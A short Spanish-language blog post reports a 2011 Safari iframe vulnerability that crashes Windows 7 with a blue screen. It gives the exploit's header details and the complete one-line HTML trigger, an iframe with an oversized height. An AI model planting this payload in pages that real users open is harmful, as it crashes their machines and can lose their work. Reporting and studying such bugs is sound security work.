Para los que no se enteraron, salió a luz una simple vulneravilidad (Safari Iframe Vulnerability 20.12.2011) que provoca un BSOD (Pantallazo Azul (de la muerte)) al abrir un archivo *.html con un iframe que excede el tamaño soportado por Safari.
Datos del Exploit :
# Exploit Title: GdiDrawStream BSoD
# Date: 18-12-2011
# Author: webDEViL
# Version: Latest
# Tested on: Windows 7 x64 using Safari
# http://twitter.com/w3bd3vil
La vulnerabilidad se explota simplemente poniendo en un archivo *.html el siguiente código:
<iframe height='18082563'></iframe>
Después simplemente al abrir el *.html con Safari se general el BSOD.
Ingeniero Civil en Computación (Universidad de Chile FCFM) y Diplomado en Gestión y Evaluación de Proyectos TI (Universidad de Chile FEN). Actualmente trabajo como Project Manager en varios proyectos y como asesor tecnológico para empresas.
0 Notaciones:
Publicar un comentario
Nota: solo los miembros de este blog pueden publicar comentarios.